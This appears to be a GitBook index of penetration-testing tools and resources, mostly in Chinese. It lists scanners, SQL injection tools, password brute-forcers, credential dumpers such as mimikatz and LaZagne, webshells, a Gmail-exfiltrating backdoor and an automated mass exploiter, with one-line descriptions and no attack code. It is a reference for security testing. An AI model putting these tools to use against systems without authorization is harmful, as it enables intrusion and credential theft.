Pentesting Resource

1. Websites/Blogs/Forums

1.1. Multi-func sites

1.2. Blogs

1.3. Report Platform

1.4. Forums

1.5. Mailing Lists

2. Tools

2.1. pentest env

2.2. Encode/Decode

2.3. Crypto

2.4. 域名/ip

2.5. XSS

2.6. 数据库扫描、注入工具 SQLi

  • 注入工具之王 sqlmap
  • NoSQLMap
  • SQLiScanner
    • 一款基于 SQLMAP 和 Charles 的被动 SQL 注入漏洞扫描工具
  • DSSS
    • 99 行代码实现的 sql 注入漏洞扫描器
  • Feigong
    • 针对各种情况自由变化的 MySQL 注入脚本
  • NoSQLAttack
    • 一款针对 mongoDB 的攻击工具
  • bbqsql
    • SQL 盲注利用框架
  • PowerUpSQL
    • 攻击 SQLSERVER 的 Powershell 脚本框架
  • whitewidow
    • 又一款数据库扫描器
  • mongoaudit
    • MongoDB审计及渗透工具
  • commix
    • 注入点命令执行利用工具
    • Short for command injection exploiter,web向命令注入检测工具
  • sqli-hunter
    • Web代理,通过加载sqlmap api进行sqli实时检测

2.7. 弱口令或信息泄漏扫描

  • awBruter
    • 千倍速一句话密码爆破工具
  • Cr3dOv3r
    • 根据邮箱自动搜索泄漏的密码信息,也可测试账户密码在各大网站能否登录的工具
  • x-crack
    • Weak password scanner, Support: FTP/SSH/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB
  • htpwdScan
    • 一个简单的 HTTP 暴力破解、撞库攻击脚本
  • BBScan
    • 一个迷你的信息泄漏批量扫描脚本
  • GitHack
    • .git 文件夹泄漏利用工具
  • BScanner
    • 基于字典的目录扫描小工具
  • fenghuangscanner_v3
    • 各种端口及弱口令检测,作者 wilson9x1 ,原地址失效
  • F-Scrack
    • 对各类服务进行弱口令检测的脚本
  • cupp
    • 根据用户习惯生成弱口令探测字典脚本
  • genpAss
    • 中国特色的弱口令生成器
  • crack_ssh
    • go写的协程版的 ssh\redis\mongodb 弱口令破解工具
  • Sreg
    • 通过输入 email, phone, username 的返回用户注册的所有互联网护照信息
  • GitPrey
    • GitHub 敏感信息扫描工具
  • gitscan
    • Github信息搜集,可实时扫描查询git最新上传有关邮箱账号密码信
  • truffleHog
    • GitHub 敏感信息扫描工具,包括检测 commit 等
  • GitHarvester
    • github Repo信息搜集工具
  • gitleaks
    • Searches full repo history for secrets and keys
  • x-patrol
    • github泄露扫描系统
  • pydictor
    • 暴力破解字典建立工具
  • Blasting_dictionary
    • 密码字典
  • xxe-recursive-download
    • xxe 漏洞递归下载工具
  • xlog
    • web日志扫描工具

2.8. 端口扫描、指纹识别以及中间件扫描

  • Nmap
      - 端口扫描器之王
      - [https://svn.nmap.org/](https://svn.nmap.org/)
    
  • anoNmap
    • anoNmap is a port scanner which utilizes Facebook's XSPA vulnerability to perform anonymous port scans
  • wyportmap
    • 目标端口扫描+系统服务指纹识别
  • weakfilescan
    • 动态多线程敏感信息泄露检测工具
  • getcms
    • A cms discover recognize tool in python
  • wafw00f
    • WAF 产品指纹识别
  • wafid
    • Wafid identify and fingerprint Web Application Firewall (WAF) products.
  • sslscan
    • ssl 类型识别
  • whatweb
    • web 指纹识别
  • FingerPrint
    • web 应用指纹识别
  • Scan-T
    • 网络爬虫式指纹识别
  • Nscan
    • a fast Network scanner inspired by Masscan and Zmap
  • F-NAScan
    • 网络资产信息扫描, ICMP 存活探测,端口扫描,端口指纹服务识别
  • F-MiddlewareScan
    • 中间件扫描
  • dirsearch
    • Web path scanner
  • bannerscan
    • C 段 Banner 与路径扫描
  • RASscan
    • 端口服务扫描
  • bypass_waf
    • waf 自动暴破
  • WAFNinja
    • 自动化绕过WAF脚本
  • xcdn
    • 尝试找出 cdn 背后的真实 ip
  • BingC
    • 基于 Bing 搜索引擎的 C 段/旁站查询,多线程,支持 API
  • DirBrute
    • 多线程 WEB 目录爆破工具
  • httpscan
    • 一个爬虫式的网段 Web 主机发现小工具
  • doom
    • thorn 上实现的分布式任务分发的ip端口漏洞扫描器
  • grab.js
    • 类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议
  • whichCDN
    • CDN 识别、检测
  • bcrpscan
    • 基于爬虫的web路径扫描器
  • Breacher
    • An admin panel finder script written in python.
  • DirBrute
    • 多线程WEB目录爆破工具

2.9. 内网安全渗透测试

  • VulScritp
    • 企业内网渗透脚本,包括 banner 扫描、端口扫描;各种通用漏洞利用等
  • VulScritp
    • 内网渗透脚本
  • PenTestScripts
  • network_backdoor_scanner
    • 基于网络流量的内网探测框架
  • WebRtcXSS
    • 自动化利用 XSS 入侵内网
  • mimikatz
    • windows渗透神器
  • PowerSploit
    • Powershell渗透库合集
  • PowerShell
    • Powershell tools合集
  • p0wnedShell
    • PowerShell Runspace Post Exploitation Toolkit
  • UACME
  • LOLBAS
  • hunter
    • 调用 Windows API 枚举用户登录信息
  • LaZagne
    • 本机密码查看提取工具
  • mimipenguin
    • linux 密码抓取神器
  • johnny
    • 密码破解工具
  • LaZagne
    • 本地存储的各类密码提取利器
  • icebreaker
    • 在内网环境下自动化攻击活动目录的工具
  • Powershell-RAT
    • Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

2.10. 针对性漏洞测试工具

  • PrivExchange
  • weblogic_unserialize_exploit
    • java反序列化漏洞的weblogic exploit命令回显exp
  • cmsPoc
    • phpcmsv9.6.0 wap模块 sql注入 获取passwd
    • icmsv7.0.1 admincp.php sql注入 后台任意登陆
  • hackUtils
    • 渗透以及 web 攻击脚本
    • java 反序列化利用工具集
  • ysoserial
    • java 反序列化利用工具
  • Jenkins
    • Jenkins 漏洞探测、用户抓取爆破
  • dzscan
    • discuz 漏洞扫描
  • CMS-Exploit-Framework
    • CMS 攻击框架
  • IIS_shortname_Scanner
    • IIS 短文件名漏洞扫描
  • FlashScanner
    • flashxss 扫描
  • SSTIF
    • 服务器端模板注入漏洞的半自动化工具
  • tplmap
    • 服务器端模板注入漏洞检测与利用工具
  • dockerscan
    • docker 扫描工具
  • break-fast-serial
    • 借助 DNS 解析来检测 Java 反序列化漏洞工具
  • dirtycow.github.io
    • 脏牛提权漏洞 exp
  • a2sv
    • Auto Scanning to SSL Vulnerability
  • msdat
    • MSDAT: Microsoft SQL Database Attacking Tool
  • xxegen
    • xxe 在线生成利用工具
  • DSXS
    • Damn Small XSS Scanner (DSXS)
    • a fully functional Cross-site scripting vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

2.11. 代码静态扫描、代码运行栈跟踪

2.12. fuzz

2.13. 漏洞利用及攻击框架

2.14. 模块化扫描、综合扫描器

  • nmap-vulners
    • NSE script using some well-known service to provide info on vulnerabilities
    • 为Nmap添砖加瓦
  • vulners-scanner
  • shodan
  • spiderfoot
  • RED_HAWK
    • All in one tool for Information Gathering, Vulnerability Scanning and Crawling.
  • V3n0M-Scanner
    • Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
  • BlackWidow
    • 基于 Python 实现的 Web 爬虫, 用于收集目标网站的情报信息并对 OWASP 漏洞进行模糊测试
  • w8scan
    • 一款模仿bugscan的漏洞扫描器
  • whitewidow
    • SQL Vulnerability Scanner
  • CMSmap
  • AngelSword
    • Python3编写的CMS漏洞检测框架
  • Luna
    • 一款开源的自动化web漏洞扫描工具
  • Zeus-Scanner
  • passive_scan
  • S7scan
  • Striker
  • xunfeng
    • 巡风是一款适用于企业内网的漏洞快速应急,巡航扫描系统。
  • ZeroExploit
    • 前后端结合检测
  • ark
    • 分布式扫描框架
  • ReconDog
  • http://www.arachni-scanner.com
  • AZScanner
    • 自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测
  • lalascan
    • 分布式web漏洞扫描框架,集合 owasp top10 漏洞扫描和边界资产发现能力
  • BkScanner
    • BkScanner 分布式、插件化 web 漏洞扫描器
  • GourdScanV2
    • 被动式漏洞扫描
  • pentestdb
    • WEB 渗透测试数据库
  • passive_scan
    • 基于 http 代理的 web 漏洞扫描器
  • Sn1per
    • 自动化扫描器,包括中间件扫描以及设备指纹识别
  • pentestEr_Fully-automatic-scanner
    • 定向全自动化渗透测试工具
  • 3xp10it
    • 自动化渗透测试框架
  • lcyscan
    • 扫描效果未验证
  • POC-T
    • 渗透测试插件化并发框架
  • V3n0M-Scanner
    • Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns
  • leakScan
    • web端的在线漏洞扫描
  • AnyScan
    • 开发中...
  • Hscan-Win-Gui
  • DorkNet
    • Selenium powered Python script to automate searching for vulnerable web apps.
  • AutoSploit
    • Automated Mass Exploiter
  • w9scan
    • 一款全能型的网站漏洞扫描器,借鉴了各位前辈的优秀代码。内置1200+插件可对网站进行一次规模的检测,功能包括但不限于web指纹检测、端口指纹检测、网站结构分析、各种流行的漏洞检测、爬虫以及SQL注入检测、XSS检测等等,w9scan会自动生成精美HTML格式结果报告。
  • Scanners-Box
    • The toolbox of open source scanners - 安全行业从业者自研开源扫描器合辑
  • HUNT
    • Identify common parameters vulnerable to certain vulnerability classes

2.15. Shell

  • webshell
  • Cknife
  • 中国蚁剑
  • PyShell
    • python 后门程序
  • PyCmd
    • python+php+jsp WebShell(一句话木马)
    • 详细参考: thief.one
  • hackUtils
    • 渗透以及 web 攻击脚本
  • phpsploit
    • PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
  • hack_tools_for_me
    • web渗透小工具大合集
  • p0wnedShell
    • 不依赖 powershell.exe 执行 PowerShell 脚本代码的环境

2.16. 无线 wifi /IoT

2.17. 企业网络自检

  • LNScan
    • 详细的内部网络信息扫描器
  • LocalNetworkScanner
    • javascript实现的本地网络扫描器
  • xunfeng
    • 网络资产识别引擎,漏洞检测引擎
  • theHarvester
    • 企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts
  • Multisearch-v2
    • 搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息

2.18. EXP编写框架及工具

  • rop-tool
    • 二进制EXP编写工具
  • pwntools
    • CTF Pwn 类题目脚本编写框架
  • zio
    • an easy-to-use io library for pwning development
  • frida
    • 跨平台注入工具
    • Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
  • Sickle
    • Shellcode development tool
  • radare2
    • unix-like reverse engineering framework and commandline tools
  • CHAOS
    • CHAOS allow generate payloads and control remote Windows systems.

2.19. MIM & phishing

2.20. Defense

2.21. Mining

2.22. Miscellaneous

2.23. CTF tools

  • Miscellaneous
  • Attacks
    • Bettercap - Framework to perform MITM (Man in the Middle) attacks.
    • Layer 2 attacks - Attack various protocols on layer 2
  • Crypto
    • FeatherDuster - An automated, modular cryptanalysis tool
    • PkCrack - A tool for Breaking PkZip-encryption
    • RSATool - Generate private key with knowledge of p and q
    • XORTool - A tool to analyze multi-byte xor cipher
  • Bruteforcers
    • Hashcat - Password Cracker
    • John The Jumbo - Community enhanced version of John the Ripper
    • John The Ripper - Password Cracker
    • Nozzlr - Nozzlr is a bruteforce framework, trully modular and script-friendly.
    • Ophcrack - Windows password cracker based on rainbow tables.
    • Patator - Patator is a multi-purpose brute-forcer, with a modular design.
  • Exploits
    • DLLInjector - Inject dlls in processes
    • libformatstr - Simplify format string exploitation.
    • Metasploit - Penetration testing software
    • one_gadget - A tool to find the one gadget execve('/bin/sh', NULL, NULL) call
      • gem install one_gadget
    • Pwntools - CTF Framework for writing exploits
    • Qira - QEMU Interactive Runtime Analyser
    • ROP Gadget - Framework for ROP exploitation
    • V0lt - Security CTF Toolkit
  • Forensics
  • Networking
    • Masscan - Mass IP port scanner, TCP port scanner
    • Nipe - Nipe is a script to make Tor Network your default gateway.
    • Nmap - open source utility for network discovery and security auditing
    • Wireshark - Analyze the network dumps
      • apt-get install wireshark
    • Zmap - an open-source network scanner
  • Reversing
    • Androguard - Reverse engineer Android applications
    • Angr - platform-agnostic binary analysis framework
    • Apk2Gold - Yet another Android decompiler
    • ApkTool - Android Decompiler
    • Barf - Binary Analysis and Reverse engineering Framework
    • Binary Ninja - Binary analysis framework
    • BinUtils - Collection of binary tools
    • BinWalk - Analyze, reverse engineer, and extract firmware images.
    • Boomerang - Decompile x86 binaries to C
    • ctf_import – run basic functions from stripped binaries cross platform
    • GDB - The GNU project debugger
    • GEF - GDB plugin
    • Hopper - Reverse engineering tool (disassembler) for OSX and Linux
    • IDA Pro - Most used Reversing software
    • Jadx - Decompile Android files
    • Java Decompilers - An online decompiler for Java and Android APKs
    • Krakatau - Java decompiler and disassembler
    • PEDA - GDB plugin (only python2.7)
    • Plasma - An interactive disassembler for x86/ARM/MIPS which can generate indented pseudo-code with colored syntax.
    • Pwndbg - A GDB plugin that provides a suite of utilities to hack around GDB easily.
    • radare2 - A portable reversing framework
    • Uncompyle - Decompile Python 2.7 binaries (.pyc)
    • WinDbg - Windows debugger distributed by Microsoft
    • Z3 - a theorem prover from Microsoft Research
    • Detox - A Javascript malware analysis tool
    • Revelo - Analyze obfuscated Javascript code
    • RABCDAsm - Collection of utilities including an ActionScript 3 assembler/disassembler.
    • Swftools - Collection of utilities to work with SWF files
    • Xxxswf - A Python script for analyzing Flash files.
  • Services
    • CSWSH - Cross-Site WebSocket Hijacking Tester
    • Request Bin - Lets you inspect http requests to a particular url
  • Steganography
    • Convert - Convert images b/w formats and apply filters
    • Exif - Shows EXIF information in JPEG files
    • Exiftool - Read and write meta information in files
    • Exiv2 - Image metadata manipulation tool
    • ImageMagick - Tool for manipulating images
    • Outguess - Universal steganographic tool
    • Pngtools - For various analysis related to PNGs
      • apt-get install pngtools
    • SmartDeblur - Used to deblur and fix defocused images
    • Steganabara - Tool for stegano analysis written in Java
    • Stegbreak - Launches brute-force dictionary attacks on JPG image
    • Steghide - Hide data in various kind of images
    • Stegsolve - Apply various steganography techniques to images
  • Web
    • Commix - Automated All-in-One OS Command Injection and Exploitation Tool.
    • Hackbar - Firefox addon for easy web exploitation
    • OWASP ZAP - Intercepting proxy to replay, debug, and fuzz HTTP requests and responses
    • Postman - Add on for chrome for debugging network requests
    • SQLMap - Automatic SQL injection and database takeover tooli
    • W3af - Web Application Attack and Audit Framework.
    • XSSer - Automated XSS testor
    • WhatWaf

3. Learning

3.1. Web application pentesting

3.2. Binary and memory exploitation

3.3. Windows and Linux Privilege Escalation

3.4. Miscellaneous

4. Wargrames/CTFs/VulEnvApp

5. WriteUps

6. Miscellaneous

Copyright © ChrisLinn 2017-2018 all right reserved,powered by Gitbook该文件修订时间: 2020-03-31 01:22:04

results matching ""

    No results matching ""